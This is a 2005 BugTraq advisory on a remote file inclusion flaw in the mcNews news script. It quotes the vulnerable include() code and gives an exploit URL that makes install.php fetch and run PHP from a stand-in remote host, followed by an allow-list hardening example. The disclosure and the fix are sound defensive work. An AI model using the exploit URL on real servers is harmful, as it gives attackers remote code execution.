BugTraq
PHP mcNews arbitrary file inclusion Mar 17 2005 12:40AM
Jonathan Whiteley (jon whiteley gmail com)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
BadRoot Security Advisory 2005-#0x01
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Thu Mar 17 2005 - 00:46 am GMT +1

Product: mcNews <=1.3 (successfully exploited on 1.3)
Vendor: http://www.phpforums.net/index.php?dir=dld (Home Page)
Type: Arbitrary file inclusion
Author: Jonathan Whiteley (Vukodlak)

Product description:
-----------------------------------

A News Management script.

Vulnerable code:
-----------------------------------

--> admin/install.php (lines 33-37)
...
if ($table==1)
{
    include($l);
    echo '<a href="index.php">'.$lGoAdmin.'</a>';
}
...

Impact:
-----------------------------------

Because $l is taken unchecked from the request and handed straight to include(), anyone can make the script fetch and execute remote PHP code by calling:
http://vuln-host.com/path/to/mcnews/admin/install.php?l=http://some.php/source

Solution:
-----------------------------------

Remove install.php; it serves no purpose after the first installation.
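Where install.php has to stay in place, the include() above can be hardened by never passing request data to include() and instead mapping it onto an allow-list of files in a fixed directory. The following is an added example, not mcNews code; LANG_DIR, the language names and the assumption that $l names a language file are illustrative.

```php
<?php
// Added example, not mcNews code. Demonstrates the fix for include($l):
// request data is validated, mapped onto an allow-list, and resolved inside
// a fixed directory before anything reaches include().

define('LANG_DIR', __DIR__ . '/lang');          // assumed: where language files live
$ALLOWED_LANGS = array('en', 'de', 'it');        // assumed: the only names accepted

function safe_language_path($l, array $allowed)
{
    // Accept only a short bare identifier: no "/", ".", ":" or scheme, so
    // neither a traversal string nor a URL can be turned into an include path.
    if (!is_string($l) || !preg_match('/^[a-z]{2,8}$/', $l)) {
        return null;
    }
    if (!in_array($l, $allowed, true)) {
        return null;
    }
    // Build the path ourselves and confirm it resolves inside LANG_DIR.
    $base = realpath(LANG_DIR);
    $path = realpath(LANG_DIR . '/' . $l . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

// Hardened replacement for the vulnerable block (keeps the $table / $lGoAdmin names):
//   $langFile = safe_language_path(isset($_GET['l']) ? $_GET['l'] : 'en', $ALLOWED_LANGS);
//   if ($langFile === null) { header('HTTP/1.0 400 Bad Request'); exit; }
//   if ($table == 1) { include $langFile; echo '<a href="index.php">'
//       . htmlspecialchars($lGoAdmin, ENT_QUOTES, 'UTF-8') . '</a>'; }

// Constructed inputs, run from the CLI: only 'en' is accepted; the remote URL
// and the traversal string from the advisory are rejected before include().
@mkdir(LANG_DIR);
file_put_contents(LANG_DIR . '/en.php', "<?php \$lGoAdmin = 'Go to admin';\n");
foreach (array('en', 'fr', '../install', 'http://some.php/source', '') as $candidate) {
    $result = safe_language_path($candidate, $ALLOWED_LANGS);
    printf("%-28s => %s\n", var_export($candidate, true),
           $result === null ? 'rejected' : 'allowed: ' . basename($result));
}
```

Disabling allow_url_fopen (and, on later PHP releases, allow_url_include) in php.ini adds a second layer so that include() cannot fetch remote URLs at all, but the allow-list is what stops local traversal as well.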

Contact:
-----------------------------------

IRC: irc.us.azzurra.org - #badroot - Vukodlak
E-Mail: jon.whiteley (at) gmail (dot) com
HP: http://www.badroot.org

Cheers

PS: Thanks to Arak for aid ;)
